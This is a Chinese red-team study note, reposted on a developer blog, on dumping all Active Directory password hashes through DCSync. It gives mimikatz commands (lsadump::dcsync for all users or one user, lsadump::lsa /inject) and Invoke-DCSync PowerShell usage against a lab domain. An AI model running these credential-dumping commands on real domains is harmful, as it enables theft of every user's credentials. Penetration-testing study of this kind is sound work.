学习
实践
活动
专区
工具
TVP
写文章
专栏首页漏洞知识库利用 dcsync 获取域内所有用户哈希值

利用 dcsync 获取域内所有用户哈希值

大家好,这里是 渗透攻击红队 的第 34 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更

dcsync 获取域内用户哈希值

mimikatz 转储哈希值

mimikatz 有一个 dcsync 功能,可以利用卷影拷贝服务直接读取 ntds.dit 文件并检索域散列值。

前提必须使用管理员权限运行 mimikatz 才可以读取 ntds.dit。

在域内任意一台主机,以域管理员权限执行命令:

lsadump::dcsync /domain:god.org /all /csv

使用 mimikatz 的 dcsync 功能也可以导出指定用户的散列值,导出用户 mary 的散列值:

lsadump::dcsync /domain:god.org /user:mary

通过转储 lsass.exe 进程对散列值进行 Dump 操作:(导出域内所有账号和域散列值)

privilege::debug
log
lsadump::lsa /inject

如果 mimikatz 没有预先执行 privilege::debug 命令,将导致权限不足、读取失败。如果用户数量太多,mimikatz 无法完全显示出来,可以先执行 log(会在mimikatz目录下生成一个文本文件,用于记录mimikatz的所有执行结果)


powershell dcsync 获取域内用户哈希值

Invoke-DCSync.ps1 可以利用 dcsync 直接读取 ntds.dit,以获取域账号和域散列值。

下载地址:https://gist.github.com/monoxgas/9d238accd969550136db

Import-Module .\Invoke-DCSync.ps1
Invoke-DCSync -PWDumpFormat
文章分享自微信公众号:
渗透攻击红队

本文参与 腾讯云自媒体分享计划 ,欢迎热爱写作的你一起参与!

作者:渗透攻击红队
原始发表时间:2020-11-27
如有侵权,请联系 cloudcommunity@tencent.com 删除。
登录 后参与评论
0 条评论

相关文章

  • 使用 Metasploit 获取哈希或域内哈希值

    大家好,这里是 渗透攻击红队 的第 35 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更

    渗透攻击红队
  • 内网渗透测试:DCSync 攻击技术的利用研究

    在域环境中,不同域控制器(DC)之间,每 15 分钟都会有一次域数据的同步。当一个域控制器(DC 1)想从其他域控制器(DC 2)获取数据时,DC 1 会向 D...

    FB客服
  • 基于AD Event日志识别DCSync攻击

    DCSync攻击是一种常见的域控攻击方法,利用DCSync导出域内用户的哈希值,本质上就是利用DRS(Directory Replication Service...

    Bypass
  • 导出域内用户hash的几种方法

    在渗透测试期间,可以利用域管权限对域内用户hash进行导出和破解。这些域内用户hash存储在域控制器(NTDS.DIT)中的数据库文件中,并带有一些其他信息,如...

    Jumbo
  • 内网渗透测试研究:从NTDS.dit获取域散列值

    本文我们将演示如何获取域控制器上的Ntds.dit文件并提取其中的域账户和密码哈希。

    FB客服
  • 内网渗透 | 域渗透之Dcsync的利用实战

    在域环境中,不同域控制器(DC)之间,每 15 分钟都会有一次域数据的同步。当一个域控制器(DC 1)想从其他域控制器(DC 2)获取数据时,DC 1 会向 D...

    HACK学习
  • 利用Account Operators组实现接管域控或权限提升

    在域渗透的过程中,我们往往只会关注Domain admins组和Enterprise Admins组,而会忽略了其它组。今天,我们要讲的是Account O...

    谢公子
  • 白银票据(Silver Ticket)攻击

    大家好,这里是 渗透攻击红队 的第 38 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更

    渗透攻击红队
  • CVE-2021-26857 Exchange RCE结合Write Dcsync Acl打域控

    CVE-2021-26858/CVE-2021-27065是Exchange邮箱服务器近期爆出的严重RCE漏洞,利用此漏洞的攻击者可以获取Exchang...

    谢公子
  • 内网渗透基石篇之域控制器

    在通常情况下,即使拥有管理员权限,也无法读取域控制器中的ndts.dit文件,但是我们又非常想获得这个文件的内容,这个时候就需要使用windows本地卷影拷贝服...

    FB客服
  • 什么是渗透_mitotracker deep red

    Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取...

    全栈程序员站长
  • 抓取域密码哈希的各种工具集合

    在拿到域管理员权限之后,都会提取所有域用户的密码哈希进行离线破解和分析。这些密码哈希存储在域控制器(NTDS.DIT)中的数据库文件中,并包含一些附加信息,如组...

    信安之路
  • 无需登录域控服务器也能抓 HASH 的方法

    Active Directory 帮助 IT 团队在整个网络中集中管理系统、用户、策略等。因为它是组织不可分割的一部分,所以这给攻击者提供了机会,利用 Acti...

    信安之路
  • 内网学习笔记 | 29、白银票据

    白银票据(Sliver Ticket) 不同于黄金票据(Golden Ticket)

    TeamsSix
  • 利用BloodHound与Impacket进行域渗透实战

    域渗透对于初学者来说,主要难点在于涉及域的基础理论知识较多,比如ACL访问控制、DcSync权限、黄金票据、白银票据、Access Token、哈希传递等等。

    FB客服
  • 内网协议NTLM之内网大杀器CVE-2019-1040漏洞

    Preempt的研究人员发现了如何在NTLM身份验证上绕过MIC(Message Integrity Code)保护措施并修改NTLM消息流中的任何字段(包括签...

    黑白天安全
  • 内网横向移动思路和技巧

    攻击者借助跳板机进一步入侵内网服务器后,接着会通过各种方式来获取目标系统权限,获取用户的明文密码或Hash值在内网中横向移动。

    Bypass
  • 内网学习笔记 | 30、跨域安全(完结)

    当有多个域时,不同的域之间想进行资源共享,就需要用到域信任,只有当域之间互相信任后,才能进行资源共享。

    TeamsSix

扫码关注腾讯云开发者

领取腾讯云代金券